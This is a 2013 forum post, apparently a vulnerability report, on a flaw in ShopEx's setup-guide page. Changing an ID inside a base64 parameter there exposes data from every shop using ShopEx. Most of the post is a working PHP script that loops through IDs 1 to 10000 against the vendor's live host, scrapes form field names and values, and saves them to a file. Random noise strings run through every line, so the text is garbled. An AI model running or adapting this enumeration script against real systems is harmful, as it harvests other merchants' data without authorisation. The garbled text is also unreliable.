|
|
简要描述:
2 d! k0 z% b X" z) v% EShopEx某接口缺陷,可遍历所有网站
4 x* h# i' I; _( Q: \( S4 e详细说明:0 ?- T6 b1 i% ?' {+ h. h3 O2 U
问题出现在shopex 网店使用向导页面 # Q6 g9 D2 r6 {" `- w1 p
, n) T1 u0 A: ~2 B& v
, M1 Y* @6 s# ?2 d" m( J( q
. ~. C. H& M R; }/ A- K0 N; n
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=( s2 c+ Y, c3 a* `( M' [8 ?
# v+ } q4 N9 Q, t- c+ \( j- W
* I& L! k4 `4 G: e
/ `$ T( \" h& T5 k. V# g$ I# trefer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}! {0 ]. D x, o1 H& `; u- I
2 `. h4 N& B! t& |3 V
. W5 C' `$ j0 x. r) C2 T, N8 \ u: \/ f6 o% a- Y
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 & i( c. }8 ?" y1 O! b* @ X: r
" X" Q7 c" }, h5 W) Z6 b
8 ^( j b" m; ~9 E% V: F" {4 {0 U, O6 a& ?, F1 ^& u6 B* j
<?php% @, t+ X, ^& h, g
1 G; m9 v% ~( q
for ($i=1; $i < 10000; $i++) { //遍历
! P% m0 d/ k3 m' \4 U7 {1 ^0 O0 u* Q: ^& x- ]/ w1 o$ \8 _
ShowshopExD($i);- T3 U2 R1 N" f/ X4 ?- I( a7 u
7 J- k( r! p! S3 `/ A; ^ }
: i8 ?2 ~/ |; q3 T4 A
4 f$ r- N0 e6 G function ShowshopExD($cid) {
6 h5 {7 t0 B( |. {6 q
! j) }* J5 L% q $url='http://guide.ecos.shopex.cn/step2.php';) t; t' T1 G7 N$ ^' h# U) d
/ `7 ~$ p7 z7 g+ n
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
0 l; z0 @# _ x) w4 K1 v2 Y. F W/ N6 L' x5 V& \
$url = $url.'?refer='.$refer;
7 |# I8 J0 V! d% W; T- D. T" y: D( J5 _, M- f0 m. A
$ch = curl_init($url);
% Y) m# \1 a, U0 z' t; A/ X2 s; x
1 u: h* k( r9 f0 d2 x+ I5 B7 B curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
# \3 l2 I) m0 M
* B4 W; ]5 t. D/ n: f! j' x, ^3 y curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
9 Z- o2 C' F# C
& w, O5 l _6 z0 [3 `3 [, U4 d $result = curl_exec($ch);- W2 L" U0 q7 _9 |2 F9 n* q
) [3 Q# j8 R& n, {& i/ I
$result = mb_convert_encoding($result, "gb2312", "UTF-8");
! w8 w$ c$ P. q+ d
3 g& s$ C! }# [0 j! p) X if(strpos($result,$refer))
* m% f4 K2 z7 l* r5 n2 E5 j- Y6 G, T" p/ c- R. z4 ~
{
/ A8 V( r; e2 q+ F/ L: L
( f7 b% A: O) j: \1 N; W $fp = fopen("c:/shopEx.txt",'ab'); //保存文件
1 r9 m: ~5 `: A
% x6 x3 m9 V2 U4 c! e preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
; C/ u, [ j# T0 [
' P, ?" I4 G- `0 d foreach ($value[1] as $key) {7 R' \4 B8 `3 p. @6 i( _
( D7 {$ s: M# f. H- n/ e9 C' x/ A preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
" W6 X# h/ I+ ?( M6 M/ P
) k& X7 j5 R3 v6 l echo $res[1][0].':'.$res[3][0]."\r\n";3 q$ x* u. t2 R. F' B
+ c2 X* Q: d; A4 C+ W! \ $col =$res[1][0].':'.$res[3][0]."\r\n";
- d# U4 X, J1 e- a( n9 \/ ]
+ G9 k; C+ Y7 \7 Z fwrite($fp, $col, strlen($col)); , D# Y/ ?: a6 B) S8 P
8 Q; L5 r9 x1 a8 Y }
9 L5 I! Y7 [" A/ s$ }
$ e' R& m: |- c, X echo '--------------------------------'."\r\n";; [ l2 S3 c# B% V) z2 \
* F6 I- p2 F5 q+ r7 @" |+ ~ fclose($fp);
4 V2 e, |8 h) R& p/ @; M7 B$ t8 b+ [( i- o
}- g8 _$ g# W j
8 I) G5 R) F; L c flush();, s" I# b+ W4 ~1 w _1 x) n9 [
% I0 F, D8 b& `/ l! x curl_close($ch);- X4 j- b. H* o4 Z; y4 t. g
- Z% C, y- R p$ ]
}
9 V0 u" e( X6 d+ d9 w. z% Z& V4 }* }
?>
9 y1 u: I/ K: \1 J漏洞证明:
0 k2 j* Z# a4 B6 n C& e/ u* fhttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg. h, M. n4 V5 f! f4 f
refer换成其他加密方式+ [+ z+ B+ ^) V) U, n" l
|
|
发表于 2013-9-21 15:59:47
收藏
支持
反对